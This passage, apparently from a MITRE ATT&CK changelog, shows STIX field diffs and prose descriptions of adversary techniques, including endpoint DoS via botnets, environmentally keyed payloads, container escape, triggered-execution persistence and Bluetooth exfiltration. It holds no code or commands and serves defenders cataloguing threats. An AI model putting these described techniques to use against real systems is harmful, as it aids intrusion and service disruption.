Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
| external_references[1]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/227.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[2]['source_name'] | capec | FSISAC FraudNetDoS September 2012 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/131.html | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf |
| external_references[3]['source_name'] | capec | ArsTechnica Great Firewall of China |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/130.html | https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/ |
| external_references[4]['source_name'] | capec | FireEye OpPoisonedHandover February 2016 |
| external_references[4]['url'] | https://capec.mitre.org/data/definitions/125.html | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html |
| external_references[5]['source_name'] | FireEye OpPoisonedHandover February 2016 | USNYAG IranianBotnet March 2016 |
| external_references[5]['description'] | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged |
| external_references[6]['source_name'] | FSISAC FraudNetDoS September 2012 | Symantec DDoS October 2014 |
| external_references[6]['description'] | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019. |
| external_references[6]['url'] | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf | https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf |
| external_references[7]['source_name'] | Symantec DDoS October 2014 | capec |
| external_references[7]['url'] | https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf | https://capec.mitre.org/data/definitions/227.html |
| external_references[8]['source_name'] | USNYAG IranianBotnet March 2016 | capec |
| external_references[8]['url'] | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged | https://capec.mitre.org/data/definitions/131.html |
| external_references[9]['source_name'] | ArsTechnica Great Firewall of China | capec |
| external_references[9]['url'] | https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/ | https://capec.mitre.org/data/definitions/130.html |
| external_references[10]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[10]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/125.html |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Application Log: Application Log Content |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Sensor Health: Host Status |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| Description |
|---|
| Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs). Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-09 18:53:58.159000+00:00 | 2022-05-04 14:52:51.290000+00:00 |
| external_references[1]['source_name'] | EK Clueless Agents | Proofpoint Router Malvertising |
| external_references[1]['description'] | Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019. | Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019. |
| external_references[1]['url'] | https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf | https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices |
| external_references[3]['source_name'] | Proofpoint Router Malvertising | Ebowla: Genetic Malware |
| external_references[3]['description'] | Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019. | Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019. |
| external_references[3]['url'] | https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices | https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf |
| external_references[4]['source_name'] | EK Impeding Malware Analysis | EK Clueless Agents |
| external_references[4]['description'] | Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019. | Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019. |
| external_references[4]['url'] | https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf | https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf |
| external_references[5]['source_name'] | Environmental Keyed HTA | EK Impeding Malware Analysis |
| external_references[5]['description'] | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. | Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019. |
| external_references[5]['url'] | https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/ | https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf |
| external_references[6]['source_name'] | Ebowla: Genetic Malware | Demiguise Guardrail Router Logo |
| external_references[6]['description'] | Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019. | Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019. |
| external_references[6]['url'] | https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf | https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js |
| external_references[7]['source_name'] | Demiguise Guardrail Router Logo | Environmental Keyed HTA |
| external_references[7]['description'] | Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019. | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. |
| external_references[7]['url'] | https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js | https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ |
| x_mitre_defense_bypassed[1] | Host forensic analysis | Host Forensic Analysis |
| x_mitre_defense_bypassed[2] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[3] | Static file analysis | Static File Analysis |
| Old Description | New Description |
|---|---|
| Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:59:35.913000+00:00 | 2022-10-21 20:03:06.707000+00:00 |
| description | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. |
| external_references[1]['source_name'] | Docker Overview | Container Escape |
| external_references[1]['description'] | Docker. (n.d.). Docker Overview. Retrieved March 30, 2021. | 0xn3va. (n.d.). Escaping. Retrieved May 27, 2022. |
| external_references[1]['url'] | https://docs.docker.com/get-started/overview/ | https://0xn3va.gitbook.io/cheat-sheets/container/escaping |
| external_references[2]['source_name'] | Docker Bind Mounts | Windows Server Containers Are Open |
| external_references[2]['description'] | Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021. | Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021. |
| external_references[2]['url'] | https://docs.docker.com/storage/bind-mounts/ | https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/ |
| external_references[3]['source_name'] | Trend Micro Privileged Container | Docker Overview |
| external_references[3]['description'] | Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021. | Docker. (n.d.). Docker Overview. Retrieved March 30, 2021. |
| external_references[3]['url'] | https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html | https://docs.docker.com/get-started/overview/ |
| external_references[4]['source_name'] | Intezer Doki July 20 | Docker Bind Mounts |
| external_references[4]['description'] | Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021. | Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021. |
| external_references[4]['url'] | https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ | https://docs.docker.com/storage/bind-mounts/ |
| external_references[5]['source_name'] | Windows Server Containers Are Open | Trend Micro Privileged Container |
| external_references[5]['description'] | Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021. | Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021. |
| external_references[5]['url'] | https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/ | https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html |
| x_mitre_data_sources[3] | Process: Process Creation | Volume: Volume Modification |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Intezer Doki July 20', 'description': 'Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.', 'url': 'https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/'} | |
| external_references | {'source_name': 'Crowdstrike Kubernetes Container Escape', 'description': 'Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.', 'url': 'https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/'} | |
| external_references | {'source_name': 'Keyctl-unmask', 'description': 'Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.', 'url': 'https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/'} | |
| x_mitre_contributors | CrowdStrike | |
| x_mitre_contributors | Eran Ayalon, Cybereason | |
| x_mitre_contributors | Oren Ofer, Cybereason | |
| x_mitre_contributors | Ilan Sokol, Cybereason | |
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Kernel: Kernel Module Load |
| Old Description | New Description |
|---|---|
| Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. | Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:11:14.193000+00:00 | 2022-10-19 15:44:20.456000+00:00 |
| description | Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. | Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. |
| external_references[2]['source_name'] | Malware Persistence on OS X | Microsoft DART Case Report 001 |
| external_references[2]['description'] | Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017. | Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022. |
| external_references[2]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Metadata |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | File: File Creation |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Creation | WMI: WMI Creation |
| x_mitre_data_sources[4] | File: File Modification | Module: Module Load |
| x_mitre_data_sources[5] | WMI: WMI Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[6] | File: File Metadata | File: File Modification |
| x_mitre_data_sources[7] | Module: Module Load | Command: Command Execution |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Backdooring an AWS account', 'description': 'Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.', 'url': 'https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9'} | |
| external_references | {'source_name': 'Varonis Power Automate Data Exfiltration', 'description': 'Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.', 'url': 'https://www.varonis.com/blog/power-automate-data-exfiltration'} | |
| external_references | {'source_name': 'Malware Persistence on OS X', 'description': 'Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'} | |
| x_mitre_data_sources | Cloud Service: Cloud Service Modification | |
| x_mitre_platforms | SaaS | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | Office 365 |
| Description |
|---|
| Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019) Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-09 18:53:58.471000+00:00 | 2022-05-03 02:39:29.314000+00:00 |
| external_references[1]['source_name'] | FireEye Kevin Mandia Guardrails | FireEye Outlook Dec 2019 |
| external_references[1]['description'] | Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019. | McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020. |
| external_references[1]['url'] | https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/ | https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html |
| external_references[2]['source_name'] | FireEye Outlook Dec 2019 | FireEye Kevin Mandia Guardrails |
| external_references[2]['description'] | McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020. | Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html | https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/ |
| x_mitre_defense_bypassed[1] | Host forensic analysis | Host Forensic Analysis |
| x_mitre_defense_bypassed[2] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[3] | Static file analysis | Static File Analysis |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. | Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 00:34:55.439000+00:00 | 2022-03-08 21:02:15.802000+00:00 |
| description | Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. | Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Command: Command Execution |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[4] | Command: Command Execution | Network Traffic: Network Traffic Content |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
